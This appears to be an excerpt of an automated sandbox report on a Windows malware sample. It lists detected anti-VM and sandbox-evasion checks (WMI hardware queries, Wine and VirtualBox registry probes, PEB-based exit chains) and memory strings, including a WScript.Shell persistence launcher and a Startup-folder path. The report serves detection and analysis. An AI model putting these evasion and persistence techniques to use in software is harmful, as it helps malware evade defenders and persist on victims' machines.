Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: pohtent2.exe PID: 8056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 13156, type: MEMORYSTR

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\lIocM276SA.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_0-12752
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep	graph_6-36974
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_1-9881

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\lIocM276SA.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wscript.exe, 00000035.00000002.2567465954.000002602A7F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""D.VBS=
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RC:\USERS\user\APPDATA\ROAMING\TYPEID.EXE
Source: wscript.exe, 00000035.00000002.2567465954.000002602A7F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2610768568.000000000136E000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.0000000003721000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000035BA000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.000000000363E000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2610768568.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2612076650.00000000015E0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2610493793.00000000012FC000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000037FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PEID.EXE
Source: TypeId.exe, 0000003B.00000002.2610768568.0000000001388000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEINH:
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000035BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXELR^Q$
Source: TypeId.exe, 0000003B.00000002.2610768568.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEJ
Source: wscript.exe, 00000035.00000002.2567465954.000002602A7F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE:ZONE.IDENTIFIER
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ULD NOT FIND FILE 'C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE'.
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2610768568.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/TYPEID.EXE
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \USERS\user\APPDATA\ROAMING\TYPEID.EXE
Source: wscript.exe, 00000035.00000002.2567465954.000002602A7F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
Source: wscript.exe, 00000035.00000002.2567725390.000002602AAEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBSCRIPT - SCRIPT BLOCKCREATEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
Source: wscript.exe, 00000035.00000002.2567725390.000002602AAE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXET-^Q
Source: wscript.exe, 00000035.00000002.2567465954.000002602A7F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GY&4 TYPEID.EXEF
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000036AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXELR^Q
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEM
Source: wscript.exe, 00000035.00000002.2567725390.000002602AAEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/USERS/user/APPDATA/ROAMING/TYPEID.EXE[
Source: TypeId.exe, 0000003B.00000002.2610768568.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEEXE
Source: TypeId.exe, 0000003B.00000002.2610768568.0000000001360000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE" C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEWINSTA0\DEFAULT=::=::\ALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES\COMMON FILESCOMMONPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMW6432=C:\PROGRAM FILES\COMMON FILESCOMPUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAFPS_BROWSER_APP_PROFILE_STRING=INTERNET EXPLORERFPS_BROWSER_USER_PROFILE_STRING=DEFAULTHOMEDRIVE=C:HOMEPATH=\USERS\userLOCALAPPDATA=C:\USERS\user\APPDATA\LOCALLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2ONEDRIVE=C:\USERS\user\ONEDRIVEOS=WINDOWS_NTPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILESPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)PROGRAMW6432=C:\PROGRAM FILESPSMODULEPATH=C:\PROGRAM FILES (X86)\WINDOWSPOWERSHELL\MODULES;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\MODULES;C:\PROGRAM FILES (X86)\AUTOIT3\AUTOITXPUBLIC=C:\USERS\PUBLICSESSIONNAME=CONSOLESYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C:\USERS\user\APPDATA\LOCAL\TEMPTMP=C:\USERS\user\APPDATA\LOCAL\TEMPUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\USERS\userWINDIR=C:\WINDOWSE
Source: TypeId.exe, 0000003B.00000002.2610768568.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEO
Source: TypeId.exe, 0000003B.00000002.2610768568.0000000001396000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEU
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000033A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^Q)C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE
Source: TypeId.exe, 0000003B.00000002.2610768568.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE.CONFIG
Source: TypeId.exe, 0000003B.00000002.2870648967.00000000061C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: D3C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEP
Source: TypeId.exe, 0000003B.00000002.2610768568.0000000001360000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_13156.TXTHF6
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/USERS/user/APPDATA/ROAMING/TYPEID.EXE
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEX
Source: TypeId.exe, 0000003B.00000002.2610768568.0000000001360000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_13156.TXTXU6
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 6^Q\W^Q`,^QTC:\WINDOWSFIND FILE 'C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE'.
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEX
Source: TypeId.exe, 0000003B.00000002.2612076650.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEA
Source: TypeId.exe, 0000003B.00000002.2616387171.0000000003799000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE@
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/USERS/user/APPDATA/ROAMING/TYPEID.EXEO
Source: wscript.exe, 00000035.00000002.2567321123.000002602A730000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE\??\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEEN-GBENEN-USMYAPPLICATION.APP-----------------------------------------NN
Source: wscript.exe, 00000035.00000002.2567725390.000002602AAE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LL3.RUN(""C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"");
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEC
Source: TypeId.exe, 0000003B.00000002.2610768568.0000000001388000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""@\^Q
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000033A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^Q1FILE:///C:/USERS/user/APPDATA/ROAMING/TYPEID.EXE
Source: TypeId.exe, 0000003B.00000002.2616387171.0000000003870000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE4
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^QQCREATEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
Source: wscript.exe, 00000035.00000002.2567465954.000002602A7C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEK
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000035.00000002.2567465954.000002602A7F7000.00000004.00000020.00020000.00000000.sdmp, TypeId.vbs.7.dr	Binary or memory string: CREATEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
Source: wscript.exe	Binary or memory string: IWSHSHELL3.RUN(""C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"");
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^Q)C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEL
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: TypeId.exe, 0000003B.00000002.2610768568.0000000001360000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"
Source: TypeId.exe, 0000003B.00000002.2610768568.000000000136A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_DETECTORSTRACE_TYPEID.EXE_13156.TXT
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000035.00000002.2567465954.000002602A7F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2640518471.0000000004891000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2598681532.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.0000000004656000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000035BA000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2610768568.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2870648967.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2610493793.00000000012FC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXE
Source: TypeId.exe, 0000003B.00000002.2610768568.0000000001360000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_13156.TXT
Source: wscript.exe, 00000035.00000002.2567465954.000002602A827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/USERS/user/APPDATA/ROAMING/TYPEID.EXE7
Source: pohtent2.exe, 00000007.00000002.2788675605.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXER/V
Source: wscript.exe, 00000035.00000002.2567725390.000002602AAE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"
Source: TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^Q)C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE@
